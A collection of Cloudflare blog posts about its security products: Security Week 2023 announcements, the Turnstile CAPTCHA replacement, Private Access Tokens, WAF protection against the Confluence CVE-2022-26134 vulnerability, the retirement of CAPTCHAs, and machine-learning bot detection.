Stop Brand Impersonation with Cloudflare DMARC Management	Brand impersonation continues to be a big problem globally. Setting SPF, DKIM and DMARC policies is a great way to reduce that risk, and protect your domains from being used in spoofing emails. But maintaining a correct SPF configuration can be very costly and time consuming, and that’s why we’re launching Cloudflare DMARC Management.
How we built DMARC Management using Cloudflare Workers	At Cloudflare, we use the Workers platform and our product stack to build new services. Read how we made the new DMARC Management solution entirely on top of our APIs.
Cloudflare partners with KnowBe4 to equip organizations with real-time security coaching to avoid phishing attacks	Cloudflare’s cloud email security solution now integrates with KnowBe4, allowing mutual customers to offer real-time coaching to employees when a phishing campaign is detected by Cloudflare.
Introducing custom pages for Cloudflare Access	We are excited to announce new options to customize user experience in Access, including customizable pages including login, blocks and the application launcher.
Cloudflare Access is the fastest Zero Trust proxy	Cloudflare Access is 75% faster than Netskope and 50% faster than Zscaler, and our network is faster than other providers in 48% of last mile networks.

Saturday

Blog	Summary
One-click ISO 27001 certified deployment of Regional Services in the EU	Cloudflare announces one-click ISO certified region, a super easy way for customers to limit where traffic is serviced to ISO 27001 certified data centers inside the European Union.
Account level Security Analytics and Security Events: better visibility and control over all account zones at once	All WAF customers will benefit fromAccount Security Analytics and Events. This allows organizations to new eyes on your account in Cloudflare dashboard to give holistic visibility. No matter how many zones you manage, they are all there!
Wildcard and multi-hostname support in Cloudflare Access	We are thrilled to announce the full support of wildcard and multi-hostname application definitions in Cloudflare Access. Until now, Access had limitations that restricted it to a single hostname or a limited set of wildcards

Watch our Security Week sessions on Cloudflare TV

Watch all of the Cloudflare TV segments here.

What’s next?

While that’s it for Security Week 2023, you all know by now that Innovation weeks never end for Cloudflare. Stay tuned for a week full of new developer tools coming soon, and a week dedicated to making the Internet faster later in the year.

Welcome to Security Week 2023

Reid Tatoris — Sun, 12 Mar 2023 17:00:00 GMT

Last month I had the chance to attend a dinner with 56 CISOs and CSOs across a range of banking, gaming, ecommerce, and retail companies. We rotated between tables of eight people and talked about the biggest challenges those in the group were facing, and what they were most worried about around the corner. We talk to customers every day at Cloudflare, but this was a unique opportunity to listen to customers (and non-customers) talk to each other. It was a fascinating evening and a few things stood out.

The common thread that dominated the discussions was “how do I convince my business and product teams to do the things I want them to”. Surprisingly little time was spent on specific technical challenges. No one brought up a concern about recent advanced mage cart skimmers, or about protecting their new GraphQL APIs, or how to secure two different cloud vendors at once, or about the size of DDoS attacks consistently getting larger. Over and over again the conversation came back to struggles with getting humans to do the secure thing, or to not do the insecure thing.

This instantly brought to mind a major phishing attack that Cloudflare was able to thwart last August. The attack was extremely sophisticated, using targeted text messages and an extremely professional impersonation of our Okta login page. Cloudflare did have individual employees fall for the phishing messages, because we are made up of a team of humans who are human. But we were able to thwart the attack through our own use of Cloudflare One products, and physical security keys issued to every employee that are required to access all our applications. The attacker was able to obtain compromised username and password credentials, but they could not get past the hard key requirement to log in. In 2023 phishing attacks are only getting more frequent.

Today's security challenges are often a case of having the right tools deployed to prevent people from making mistakes. Last year when we kicked off Security Week, we talked about making a shift from protecting websites, to protecting applications. Today, the shift is from protecting applications, to protecting employees, and making sure they are protected everywhere. Just a few weeks ago, the White House released a new national cybersecurity strategy directing all agencies to “implement multi-factor authentication, gain visibility into their entire attack surface, manage authorization and access, and adopt cloud security tools”. Over the next six days you’ll read more than 30 announcements that will make it as easy as possible to do just that.

Welcome to Security Week 2023.

“The more tools you use the less secure you are”

This was a direct quote from the CISO of a large online gaming platform. Adding more vendors might seem like you are adding layers of security, but you do also open up avenues for risk. First, every third party you add by definition adds another potential vulnerability. The recent LastPass breach is a perfect example. Attackers gained access to a cloud storage service, which gave them information they used in a secondary attack to phish an employee. Second, more tools means more complexity. More systems to log into, more dashboards to check. If information is spread across multiple systems you are more likely to miss important changes. Third, the more tools you use, the less likely it is that anyone is able to master them all. If you need the person who knows the application security tool, and the person who knows the SIEM, and the person who knows the access tool to coordinate on every potential vulnerability, things will get lost in translation. Complexity is the enemy of security. Fourth, adding more tools can add a false sense of security. Simply adding a new tool can give the impression you’ve added defense in depth. But that tool only adds protection if it works, if it's configured properly, and if people actually use it.

This week, you will hear about all of the initiatives we’ve been working on to help you solve this problem. We will announce multiple integrations that make it easier for you to deploy and manage Zero Trust anywhere, across multiple platforms, but all within the Cloudflare dashboard. We’re also extending our proven detection capabilities into new areas that will help you solve problems you couldn’t solve before, and thus allow you to get rid of additional vendors. And we’ll announce a brand new migration tool that makes it dead simple to move from those other vendors to Cloudflare.

Leverage machine learning to let humans focus on critical thinking

We all hear machine learning thrown around as a buzzword too often, but it boils down to this: computers are really good at finding patterns. When we train them on what a good pattern looks like, they can spot them really well, and spot the outliers. Humans are great at finding patterns too. But it takes us a long time, and any time we spend finding patterns distracts us from the thing that even the best AI or ML model still can’t do: critical thinking. By using machine learning to find these good and bad patterns, you can optimize the time of your most valuable people. Rather than searching for exceptions, they can focus on only those exceptions, and use their wisdom to make the hard decisions about what to do next.

Cloudflare has used machine learning to catch DDoS attacks, malicious bots, and malicious web traffic. We were able to do this differently from others because we built a unique network where we run all of our code at every single data center, on every single machine. Since we have a massive global network that is close to end users, we can run machine learning close to those users, unlike competitors who have to use centralized data centers. The result is a machine learning pipeline that runs inference in a few microseconds. That unique speed is an advantage for our customers, one we now use to run inference more than 40 million times every second.

This week, we have an entire day focused on how we are using that machine learning pipeline to build new models that will allow you to find new patterns, like fraud and API endpoints.

Our intelligence is your intelligence

In June we announced Cloudforce One, the first step in our threat operations team dedicated to turning the intelligence we gather from handling nearly 20% of Internet traffic into actionable insights. Since that launch, we’ve heard customers ask us to do more with those insights and give them easy buttons and products to take the appropriate action on their behalf. This week you’ll read multiple announcements on new ways that you can view and take action on unique Cloudflare threat intelligence. We’ll also be announcing multiple new reporting views, like being able to view more data at an account level so you can have one single lens into security trends across your entire organization.

Make it harder for humans to make mistakes

Each product, development, or business team wants to use their own tools, and wants to move as quickly as possible. For good reason! Any security that comes after the fact, and creates additional work for those teams, will be difficult to get internal buy on for. Which can lead to situations like the recent T-mobile hack where an API that was not intended to be public was exposed, discovered, and exploited. You need to meet teams where they are by making the tools they already use more secure, and preventing them from making mistakes, rather than giving them additional tasks.

In addition to making it easier to deploy our Application Security and Zero Trust products to a wider scope, you’ll also read about how we are adding new features that prevent humans from making the mistakes they always do. You’ll hear about how you can make it impossible to click on a phishing link by automatically blocking the domains that host them, prevent data from leaving regions it should never leave, give your users security alerts directly in the tools they already use, and automatically detect shadow APIs without making your developers change their development process. All of this without having to convince internal teams to make any changes to their behavior.

If you’re reading this and any part of your job involves securing an organization, I think that by the end of the week we’ll have made your job easier. With the new tools and integrations we release, you’ll be able to protect more of your infrastructure from a wider range of threats, but reduce the number of third parties you rely on. More importantly, you’ll be able to reduce the number of mistakes that the incredible humans you work with can make. I hope that helps you rest a bit easier!

Announcing Turnstile, a user-friendly, privacy-preserving alternative to CAPTCHA

Reid Tatoris — Wed, 28 Sep 2022 13:01:00 GMT

Today, we’re announcing the open beta of Turnstile, an invisible alternative to CAPTCHA. Anyone, anywhere on the Internet, who wants to replace CAPTCHA on their site will be able to call a simple API, without having to be a Cloudflare customer or sending traffic through the Cloudflare global network. Sign up here for free.

There is no point in rehashing the fact that CAPTCHA provides a terrible user experience. It's been discussed in detail before on this blog, and countless times elsewhere. The creator of the CAPTCHA has even publicly lamented that he “unwittingly created a system that was frittering away, in ten-second increments, millions of hours of a most precious resource: human brain cycles.” We hate it, you hate it, everyone hates it. Today we’re giving everyone a better option.

Turnstile is our smart CAPTCHA alternative. It automatically chooses from a rotating suite of non-intrusive browser challenges based on telemetry and client behavior exhibited during a session. We talked in an earlier post about how we’ve used our Managed Challenge system to reduce our use of CAPTCHA by 91%. Now anyone can take advantage of this same technology to stop using CAPTCHA on their own site.

UX isn’t the only big problem with CAPTCHA — so is privacy

While having to solve a CAPTCHA is a frustrating user experience, there is also a potential hidden tradeoff a website must make when using CAPTCHA. If you are a small site using CAPTCHA today, you essentially have one option: an 800 pound gorilla with 98% of the CAPTCHA market share. This tool is free to use, but in fact it has a privacy cost: you have to give your data to an ad sales company.

According to security researchers, one of the signals that Google uses to decide if you are malicious is whether you have a Google cookie in your browser, and if you have this cookie, Google will give you a higher score. Google says they don’t use this information for ad targeting, but at the end of the day, Google is an ad sales company. Meanwhile, at Cloudflare, we make money when customers choose us to protect their websites and make their services run better. It's a simple, direct relationship that perfectly aligns our incentives.

Less data collection, more privacy, same security

In June, we announced an effort with Apple to use Private Access Tokens. Visitors using operating systems that support these tokens, including the upcoming versions of macOS or iOS, can now prove they’re human without completing a CAPTCHA or giving up personal data.

By collaborating with third parties like device manufacturers, who already have the data that would help us validate a device, we are able to abstract portions of the validation process, and confirm data without actually collecting, touching, or storing that data ourselves. Rather than interrogating a device directly, we ask the device vendor to do it for us.

Private Access Tokens are built directly into Turnstile. While Turnstile has to look at some session data (like headers, user agent, and browser characteristics) to validate users without challenging them, Private Access Tokens allow us to minimize data collection by asking Apple to validate the device for us. In addition, Turnstile never looks for cookies (like a login cookie), or uses cookies to collect or store information of any kind. Cloudflare has a long track record of investing in user privacy, which we will continue with Turnstile.

We are opening our CAPTCHA replacement to everyone

To improve the Internet for everyone, we decided to open up the technology that powers our Managed Challenge to everyone in beta as a standalone product called Turnstile.

Rather than try to unilaterally deprecate and replace CAPTCHA with a single alternative, we built a platform to test many alternatives and rotate new challenges in and out as they become more or less effective. With Turnstile, we adapt the actual challenge outcome to the individual visitor/browser. First we run a series of small non-interactive JavaScript challenges gathering more signals about the visitor/browser environment. Those challenges include proof-of-work, proof-of-space, probing for web APIs, and various other challenges for detecting browser-quirks and human behavior. As a result, we can fine-tune the difficulty of the challenge to the specific request.

Turnstile also includes machine learning models that detect common features of end visitors who were able to pass a challenge before. The computational hardness of those initial challenges may vary by visitor, but is targeted to run fast.

Swap out your existing CAPTCHA in a few minutes

You can take advantage of Turnstile and stop bothering your visitors with a CAPTCHA even without being on the Cloudflare network. While we make it as easy as possible to use our network, we don't want this to be a barrier to improving privacy and user experience.

To switch from a CAPTCHA service, all you need to do is:

Create a Cloudflare account, navigate to the `Turnstile` tab on the navigation bar, and get a sitekey and secret key.
Copy our JavaScript from the dashboard and paste over your old CAPTCHA JavaScript.
Update the server-side integration by replacing the old siteverify URL with ours.

There is more detail on the process below, including options you can configure, but that’s really it. We’re excited about the simplicity of making a change.

Deployment options and analytics

To use Turnstile, first create an account and get your site and secret keys.

Then, copy and paste our HTML snippet:

Once the script is embedded, you can use implicit rendering. Here, the HTML is scanned for elements that have a cf-turnstile class:

Once a challenge has been solved, a token is injected in your form, with the name cf-turnstile-response. This token can be used with our siteverify endpoint to validate a challenge response. A token can only be validated once, and a token cannot be redeemed twice. The validation can be done on the server side or even in the cloud, for example using a simple Workers fetch (see a demo here):

async function handleRequest() {
    // ... Receive token
    let formData = new FormData();
    formData.append('secret', turnstileISecretKey);
    formData.append('response', receivedToken);
 
    await fetch('https://challenges.cloudflare.com/turnstile/v0/siteverify',
        {
            body: formData,
            method: 'POST'
        });
    // ...
}

For more complex use cases, the challenge can be invoked explicitly via JavaScript:

You can also create what we call 'Actions'. Custom labels that allow you to distinguish between different pages where you're using Turnstile, like a login, checkout, or account creation page.

Once you’ve deployed Turnstile, you can go back to the dashboard and see analytics on where you have widgets deployed, how users are solving them, and view any defined actions.

Why are we giving this away for free?

While this is sometimes hard for people outside to believe, helping build a better Internet truly is our mission. This isn’t the first time we’ve built free tools that we think will make the Internet better, and it won’t be the last. It's really important to us.

So whether or not you’re a Cloudflare customer today, if you’re using a CAPTCHA, try Turnstile for free, instead. You’ll make your users happier, and minimize the data you send to third parties.

Visit this page to sign up for the best invisible, privacy-first, CAPTCHA replacement and to retrieve your Turnstile beta sitekey.

If you want to read more, refer to our documentation.

Private Access Tokens: eliminating CAPTCHAs on iPhones and Macs with open standards

Reid Tatoris — Wed, 08 Jun 2022 16:01:46 GMT

Today we’re announcing Private Access Tokens, a completely invisible, private way to validate that real users are visiting your site. Visitors using operating systems that support these tokens, including the upcoming versions of macOS or iOS, can now prove they’re human without completing a CAPTCHA or giving up personal data. This will eliminate nearly 100% of CAPTCHAs served to these users.

What does this mean for you?

If you’re an Internet user:

We’re making your mobile web experience more pleasant and more private than other networks at the same time.
You won’t see a CAPTCHA on a supported iOS or Mac device (other devices coming soon!) accessing the Cloudflare network.

If you’re a web or application developer:

Know your user is coming from an authentic device and signed application, verified by the device vendor directly.
Validate users without maintaining a cumbersome SDK.

If you’re a Cloudflare customer:

You don’t have to do anything! Cloudflare will automatically ask for and utilize Private Access Tokens
Your visitors won’t see a CAPTCHA, and we’ll ask for less data from their devices.

Introducing Private Access Tokens

Over the past year, Cloudflare has collaborated with Apple, Google, and other industry leaders to extend the Privacy Pass protocol with support for a new cryptographic token. These tokens simplify application security for developers and security teams, and obsolete legacy, third-party SDK based approaches to determining if a human is using a device. They work for browsers, APIs called by browsers, and APIs called within apps. We call these new tokens Private Access Tokens (PATs). This morning, Apple announced that PATs will be incorporated into iOS 16, iPad 16, and macOS 13, and we expect additional vendors to announce support in the near future.

Cloudflare has already incorporated PATs into our Managed Challenge platform, so any customer using this feature will automatically take advantage of this new technology to improve the browsing experience for supported devices.

CAPTCHAs don’t work in mobile environments, PATs remove the need for them

We’ve written numerous times about how CAPTCHAs are a terrible user experience. However, we haven’t discussed specifically how much worse the user experience is on a mobile device. CAPTCHA as a technology was built and optimized for a browser-based world. They are deployed via a widget or iframe that is generally one size fits all, leading to rendering issues, or the input window only being partially visible on a device. The smaller real estate on mobile screens inherently makes the technology less accessible and solving any CAPTCHA more difficult, and the need to render JavaScript and image files slows down image loads while consuming excess customer bandwidth.

Usability aside, mobile environments present an additional challenge in that they are increasingly API-driven. CAPTCHAs simply cannot work in an API environment where JavaScript can’t be rendered, or a WebView can’t be called. So, mobile app developers often have no easy option for challenging a user when necessary. They sometimes resort to using a clunky SDK to embed a CAPTCHA directly into an app. This requires work to embed and customize the CAPTCHA, continued maintenance and monitoring, and results in higher abandonment rates. For these reasons, when our customers choose to show a CAPTCHA today, it's only shown on mobile 20% of the time.

We recently posted about how we used our Managed Challenge platform to reduce our CAPTCHA use by 91%. But because the CAPTCHA experience is so much worse on mobile, we’ve been separately working on ways we can specifically reduce CAPTCHA use on mobile even further.

When sites can’t challenge a visitor, they collect more data

So, you either can’t use CAPTCHA to protect an API, or the UX is too terrible to use on your mobile website. What options are left for confirming whether a visitor is real? A common one is to look at client-specific data, commonly known as fingerprinting.

You could ask for device IMEI and security patch versions, look at screen sizes or fonts, check for the presence of APIs that indicate human behavior, like interactive touch screen events and compare those to expected outcomes for the stated client. However, all of this data collection is expensive and, ultimately, not respectful of the end user. As a company that deeply cares about privacy and helping make the Internet better, we want to use as little data as possible without compromising the security of the services we provide.

Another alternative is to use system-level APIs that offer device validation checks. This includes DeviceCheck on Apple platforms and SafetyNet on Android. Application services can use these client APIs with their own services to assert that the clients they’re communicating with are valid devices. However, adopting these APIs requires both application and server changes, and can be just as difficult to maintain as SDKs.

Private Access Tokens vastly improve privacy by validating without fingerprinting

This is the most powerful aspect of PATs. By partnering with third parties like device manufacturers, who already have the data that would help us validate a device, we are able to abstract portions of the validation process, and confirm data without actually collecting, touching, or storing that data ourselves. Rather than interrogating a device directly, we ask the device vendor to do it for us.

In a traditional website setup, using the most common CAPTCHA provider:

The website you visit knows the URL, your IP, and some additional user agent data.
The CAPTCHA provider knows what website you visit, your IP, your device information, collects interaction data on the page, AND ties this data back to other sites where they have seen you. This builds a profile of your browsing activity across both sites and devices, plus how you personally interact with a page.

When PATs are used, device data is isolated and explicitly NOT exchanged between the involved parties (the manufacturer and Cloudflare)

The website knows only your URL and IP, which it has to know to make a connection.
The device manufacturer (attester) knows only the device data required to attest your device, but can't tell what website you visited, and doesn’t know your IP.
Cloudflare knows the site you visited, but doesn’t know any of your device or interaction information.

We don’t actually need or want the underlying data that’s being collected for this process, we just want to verify if a visitor is faking their device or user agent. Private Access Tokens allow us to capture that validation state directly, without needing any of the underlying data. They allow us to be more confident in the authenticity of important signals, without having to look at those signals directly ourselves.

How Private Access Tokens compartmentalize data

With Private Access Tokens, four parties agree to work in concert with a common framework to generate and exchange anonymous, unforgeable tokens. Without all four parties in the process, PATs won’t work.

An Origin. A website, application, or API that receives requests from a client. When a website receives a request to their origin, the origin must know to look for and request a token from the client making the request. For Cloudflare customers, Cloudflare acts as the origin (on behalf of customers) and handles the requesting and processing of tokens.
A Client. Whatever tool the visitor is using to attempt to access the Origin. This will usually be a web browser or mobile application. In our example, let’s say the client is a mobile Safari Browser.
An Attester. The Attester is who the client asks to prove something (i.e that a mobile device has a valid IMEI) before a token can be issued. In our example below, the Attester is Apple, the device vendor.
An Issuer. The issuer is the only one in the process that actually generates, or issues, a token. The Attester makes an API call to whatever Issuer the Origin has chosen to trust, instructing the Issuer to produce a token. In our case, Cloudflare will also be the Issuer.

In the example above, a visitor opens the Safari browser on their iPhone and tries to visit example.com.

Since Example uses Cloudflare to host their Origin, Cloudflare will ask the browser for a token.
Safari supports PATs, so it will make an API call to Apple’s Attester, asking them to attest.
The Apple attester will check various device components, confirm they are valid, and then make an API call to the Cloudflare Issuer (since Cloudflare acting as an Origin chooses to use the Cloudflare Issuer).
The Cloudflare Issuer generates a token, sends it to the browser, which in turn sends it to the origin.
Cloudflare then receives the token, and uses it to determine that we don’t need to show this user a CAPTCHA.

This probably sounds a bit complicated, but the best part is that the website took no action in this process. Asking for a token, validation, token generation, passing, all takes place behind the scenes by third parties that are invisible to both the user and the website. By working together, Apple and Cloudflare have just made this request more secure, reduced the data passed back and forth, and prevented a user from having to see a CAPTCHA. And we’ve done it by both collecting and exchanging less user data than we would have in the past.

Most customers won’t have to do anything to utilize Private Access Tokens

To take advantage of PATs, all you have to do is choose Managed Challenge rather than Legacy CAPTCHA as a response option in a Firewall rule. More than 65% of Cloudflare customers are already doing this. Our Managed Challenge platform will automatically ask every request for a token, and when the client is compatible with Private Access Tokens, we’ll receive one. Any of your visitors using an iOS or macOS device will automatically start seeing fewer CAPTCHAs once they’ve upgraded their OS.

This is just step one for us. We are actively working to get other clients and device makers utilizing the PAT framework as well. Any time a new client begins utilizing the PAT framework, traffic coming to your site from that client will automatically start asking for tokens, and your visitors will automatically see fewer CAPTCHAs.

We will be incorporating PATs into other security products very soon. Stay tuned for some announcements in the near future.

Cloudflare customers are protected from the Atlassian Confluence CVE-2022-26134

Reid Tatoris — Fri, 03 Jun 2022 05:30:00 GMT

Updated on 3rd of June: amended information according to Atlassian’s official advisory update.

On June 2, 2022 Atlassian released a security advisory for their Confluence Server and Data Center applications, highlighting a critical severity unauthenticated remote code execution vulnerability. The vulnerability is as CVE-2022-26134 and impacts all versions of Confluence Server and Data Center versions greater than 1.3.0.

Atlassian has released a patch and all Confluence customers should update immediately to the latest version available from the official download center.

Cloudflare customers using either WAF or Access are already protected. Atlassian also recommends implementing a WAF rule that blocks URLs containing ${ as it may reduce risk of being compromised.

Our own Confluence nodes are protected by both WAF and Access, and at the time of writing, we have found no evidence that our Confluence instance was exploited.

Cloudflare reviewed the security advisory, conducted our own analysis, and prepared a WAF mitigation rule via an emergency release. The rule, once tested, was deployed on June 2, 2022, at 23:38 UTC with a default action of BLOCK and the following IDs:

100531 (for our legacy WAF)
408cff2b (for our new WAF)

All websites, including free customers using the Cloudflare WAF to protect their self-hosted Confluence applications have automatically been protected since the new rule was deployed.

Customers who have deployed Cloudflare Access in front of their Confluence applications were protected from external exploitation attempts even before the emergency release. Access verifies every request made to a Confluence application to ensure it is coming from an authenticated user. Any unauthenticated users attempting this exploit would have been blocked by Cloudflare before they could reach the Confluence server.

Customers not yet using zero trust rules to protect access to their applications can follow these instructions to enable Access now in a few minutes.

Timeline of Events

2022-06-02 at 20:00 UTC	Atlassian publishes security advisory
2022-06-02 at 23:38 UTC	Cloudflare publishes WAF rule to target CVE 2022-26134

The end of the road for Cloudflare CAPTCHAs

Reid Tatoris — Fri, 01 Apr 2022 13:31:08 GMT

There is no point in rehashing the fact that CAPTCHA provides a terrible user experience. It's been discussed in detail before on this blog, and countless times elsewhere. One of the creators of the CAPTCHA has publicly lamented that he “unwittingly created a system that was frittering away, in ten-second increments, millions of hours of a most precious resource: human brain cycles.” We don’t like them, and you don’t like them.

So we decided we’re going to stop using CAPTCHAs. Using an iterative platform approach, we have already reduced the number of CAPTCHAs we choose to serve by 91% over the past year.

Before we talk about how we did it, and how you can help, let's first start with a simple question.

Why in the world is CAPTCHA still used anyway?

If everyone agrees CAPTCHA is so bad, if there have been calls to get rid of it for 15 years, if the creator regrets creating it, why is it still widely used?

The frustrating truth is that CAPTCHA remains an effective tool for differentiating real human users from bots despite the existence of CAPTCHA-solving services. Of course, this comes with a huge trade off in terms of usability, but generally the alternatives to CAPTCHA are blocking or allowing traffic, which will inherently increase either false positives or false negatives. With a choice between increased errors and a poor user experience (CAPTCHA), many sites choose CAPTCHA.

CAPTCHAs are also a safe choice because so many other sites use them. They delegate abuse response to a third party, and remove the risk from the website with a simple integration. Using the most common solution will rarely get you into trouble. Plug, play, forget.

Lastly, CAPTCHA is useful because it has a long history of a known and stable baseline. We’ve tracked a metric called CAPTCHA (or Challenge) Solve Rate for many years. CAPTCHA solve rate is the number of CAPTCHAs solved, divided by the number of page loads. For our purposes both failing or not attempting to solve the CAPTCHA count as a failure, since in either case a user cannot access the content they want to. We find this metric to typically be stable for any particular website. That is, if the solve rate is 1%, it tends to remain at 1% over time. We also find that any change in solve rate – up or down – is a strong indicator of an attack in progress. Customers can scan their logs to monitor for solve rate changes, then investigate what might be happening.

Many alternatives to CAPTCHA have been tried, including our own Cryptographic Attestation. However, to date, none have seen the amount of widespread adoption of CAPTCHAs. We believe attempting to replace CAPTCHA with a single alternative is the main reason why. When you replace CAPTCHA, you lose the stable history of the solve rate, and making decisions becomes more difficult. If you switch from deciphering text to picking images, you will get vastly different results. How do you know if those results are good or bad? So, we took a different approach.

Many solutions, not one

Rather than try to unilaterally deprecate and replace CAPTCHA with a single alternative, we built a platform to test many alternatives and see which had the best potential to replace CAPTCHA. We call this Cloudflare Managed Challenge.

Managed Challenge is a smarter solution than CAPTCHA. It defers the decision about whether to serve a visual puzzle to a later point in the flow after more information is available from the browser. Previously, a Cloudflare customer could only choose between either a CAPTCHA or JavaScript Challenge as the action of a security or firewall rule. Now, the Managed Challenge option will decide to show a visual puzzle or other means of proving humanness to visitors based on the client behavior exhibited during a challenge and based on the telemetry we receive from the visitor. A customer simply tells us, "I want you (Cloudflare) to take appropriate actions to challenge this type of traffic as you see necessary."

With Managed Challenge, we adapt the actual challenge outcome to the individual visitor/browser. As a result, we can fine-tune the difficulty of the challenge itself and avoid showing visual puzzles to more than 90% of human requests, while at the same time presenting harder challenges to visitors that exhibit non-human behaviors.

When a visitor encounters a Managed Challenge, we first run a series of small non-interactive JavaScript challenges gathering more signals about the visitor/browser environment. This means we deploy in-browser detections and challenges at the time the request is made. Challenges are selected based on what characteristics the visitor emits and based on the initial information we have about the visitor. Those challenges include, but are not limited to, proof-of-work, proof-of-space, probing for web APIs, and various challenges for detecting browser-quirks and human behavior.

They also include machine learning models that detect common features of end visitors who were able to pass a CAPTCHA before. The computational hardness of those initial challenges may vary by visitor, but is targeted to run fast. Managed Challenge is also integrated into the Cloudflare Bot Management and Super Bot Fight Mode systems by consuming signals and data from the bot detections.

After our non-interactive challenges have been run, we evaluate the gathered signals. If by the combination of those signals we are confident that the visitor is likely human, no further action is taken, and the visitor is redirected to the destined page without any interaction required. However, in some cases, if the signal is weak, we present a visual puzzle to the visitor to prove their humanness. In the context of Managed Challenge, we’re also experimenting with other privacy-preserving means of attesting humanness, to continue reducing the portion of time that Managed Challenge uses a visual puzzle step.

We started testing Managed Challenge last year, and initially, we chose from a rotating subset of challenges, one of them being CAPTCHA. At the start, CAPTCHA was still used in the vast majority of cases. We compared the solve rate for the new challenge in question, with the existing, stable solve rate for CAPTCHA. We thus used CAPTCHA solve rate as a goal to work towards as we improved our CAPTCHA alternatives, getting better and better over time. The challenge platform allows our engineers to easily create, deploy, and test new types of challenges without impacting customers. When a challenge turns out to not be useful, we simply deprecate it. When it proves to be useful, we increase how often it is used. In order to preserve ground-truth, we also randomly choose a small subset of visitors to always solve a visual puzzle to validate our signals.

Managed Challenge performs better than CAPTCHA

The Challenge Platform now has the same stable solve rate as previously used CAPTCHAs.

Using an iterative platform approach, we have reduced the number of CAPTCHAs we serve by 91%. This is only the start. By the end of the year, we will reduce our use of CAPTCHA as a challenge to less than 1%. By skipping the visual puzzle step for almost all visitors, we are able to reduce the visitor time spent in a challenge from an average of 32 seconds to an average of just one second to run our non-interactive challenges. We also see churn improvements: our telemetry indicates that visitors with human properties are 31% less likely to abandon a Managed Challenge than on the traditional CAPTCHA action.

Today, the Managed Challenge platform rotates between many challenges. A Managed Challenge instance consists of many sub-challenges: some of them are established and effective, whereas others are new challenges we are experimenting with. All of them are much, much faster and easier for humans to complete than CAPTCHA, and almost always require no interaction from the visitor.

Managed Challenge replaces CAPTCHA for Cloudflare

We have now deployed Managed Challenge across the entire Cloudflare network. Any time we show a CAPTCHA to a visitor, it’s via the Managed Challenge platform, and only as a benchmark to confirm our other challenges are performing as well.

All Cloudflare customers can now choose Managed Challenge as a response option to any Firewall rule instead of CAPTCHA. We’ve also updated our dashboard to encourage all Cloudflare customers to make this choice.

You’ll notice that we changed the name of the CAPTCHA option to ‘Legacy CAPTCHA’. This more accurately describes what CAPTCHA is: an outdated tool that we don’t think people should use. As a result, the usage of CAPTCHA across the Cloudflare network has dropped significantly, and usage of managed challenge has increased dramatically.

As noted above, today CAPTCHA represents 9% of Managed Challenge solves (light blue), but that number will decrease to less than 1% by the end of the year. You’ll also see the gray bar above, which shows when our customers have chosen to show a CAPTCHA as a response to a Firewall rule triggering. We want that number to go to zero, but the good news is that 63% of customers now choose Managed Challenge rather than CAPTCHA when they create a Firewall rule with a challenge response action.

We expect this number to increase further over time.

If you’re using the Cloudflare WAF, log into the Dashboard today and look at all of your Firewall rules. If any of your rules are using “Legacy CAPTCHA” as a response, please change it now! Select the “Managed Challenge” response option instead. You’ll give your users a better experience, while maintaining the same level of protection you have today. If you’re not currently a Cloudflare customer, stay tuned for ways you can reduce your own use of CAPTCHA.

Evolving our machine learning to stop mobile bots

Arushi Shah — Thu, 17 Mar 2022 16:39:20 GMT

When we launched Bot Management three years ago, we started with the first version of our ML detection model. We used common bot user agents to train our model to identify bad bots. This model, ML1, was able to detect whether a request is a bot or a human request purely by using the request’s attributes. After this, we introduced a set of heuristics that we could use to quickly and confidently filter out the lowest hanging fruit of unwanted traffic. We have multiple heuristic types and hundreds of specific rules based on certain attributes of the request, many of which are very hard to spoof. But machine learning is a very important part of our bot management toolset.

We started with a static model because we were starting from scratch, and we were able to experiment quickly with aggregated HTTP analytics metadata. After we launched the model, we quickly gathered feedback from early bot management customers to identify where we performed well but also how we could improve. We saw attackers getting smart, and so we generated a new set of model features. Our heuristics were able to accurately identify various types of bad bots giving us much better quality labeled data. Over time, our model evolved to adapt to changing bot behavior across multiple dimensions of the request, even if it had not been trained on that type of data before. Since then, we’ve launched five additional models that are trained on metadata generated by understanding traffic patterns across our network.

While our models were evolving over time, the patterns of traffic flowing through Cloudflare changed as well. Cloudflare started in a desktop first world, but mobile traffic has grown to make up more than 54% of traffic on our network. As mobile has become a significant share of traffic we see, we needed to adapt our strategy in order to be able to get better at detecting bots spoofing mobile applications. While desktop traffic shares many similarities regardless of the origin it’s connecting to, each mobile app is crafted with a specific use in mind, and built on a different set of APIs, with a different defined schema. We realized we needed to build a model that would prove to be more effective for websites that have mobile application traffic.

How we build and deploy our models

Before we dive into how we updated our models to incorporate an increasing volume of mobile traffic, we should first discuss how we build and train our models overall.

Data gathering and preparation

An ML model is only as good as the quality of data you train it with. We’ve been able to leverage the amount and variety of traffic on our network to create our training datasets.

We identify samples that we know are clearly bots - samples we are able to detect with heuristics or samples that are from verified bots, e.g., legitimate search engine crawlers, adbots.

We also can identify samples that are clearly not-bots. These are requests that are scored high when they solve a challenge or are authenticated.

Data analysis and feature selection

From this dataset, we can identify the best features to use, using the ANOVA (Analysis of Variance) f-value. We want to make sure different operating systems, browsers, device types, categories of bots, and fingerprints are well represented in our dataset. We perform statistical analysis of the features to understand their distribution within our datasets as well as how they would potentially influence predictions.

Model building and evaluation

Once we have our data, we can begin training a model. We’ve built an internal pipeline backed by Airflow that makes this process smooth. To train our model, we chose the Catboost library. Based on our problem definition, we train a binary classification model.

We split out training data into a training set and a test set. To choose the best hyperparameters for the model, we use the Catboost library’s grid search and random search algorithm.

We then train the model with the chosen hyperparameters.

Over time, we’ve developed granular datasets for testing out our model to ensure we accurately detect different types of bots, but we also want to make sure we have a very low false positive rate. Before we deploy our model to any customer traffic, we perform offline monitoring. We run predictions for different browsers, operating systems and devices. We then compare the predictions of the currently trained model to the production model on validation datasets. This is done with the help of validation reports created by our ML pipeline that includes summary statistics such as accuracy, feature importance for each dataset. Based on the results, we either iterate or we decide to proceed to deployment.

If we need to iterate, we like to understand better where we can make improvements. For this, we use the SHAP Explainer. The SHAP Explainer is an excellent tool to interpret your model’s prediction. Our pipeline produces SHAP graphs for our predictions, and we dig into these deeper to understand the false positives or false negatives. This helps us to understand how and where we can improve our training data or features to get better predictions. We decide if an experiment should be deployed to customer traffic when it shows improvements in a majority of our test datasets over a previous model version.

Model deployment

While offline analysis of the model is a good indicator of the model’s performance, it’s best to validate the results in real time on a wider variety of traffic. For this, we deploy every new model first in shadow mode. Shadow mode allows us to log scores for traffic in real time without actually affecting bot management customer traffic. This allows us to perform online monitoring i.e. evaluating the model’s performance in real time for traffic. We break this down by different types of bots, devices, browsers, operating systems and customers using a set of Grafana dashboards and validate model accuracy improvement.

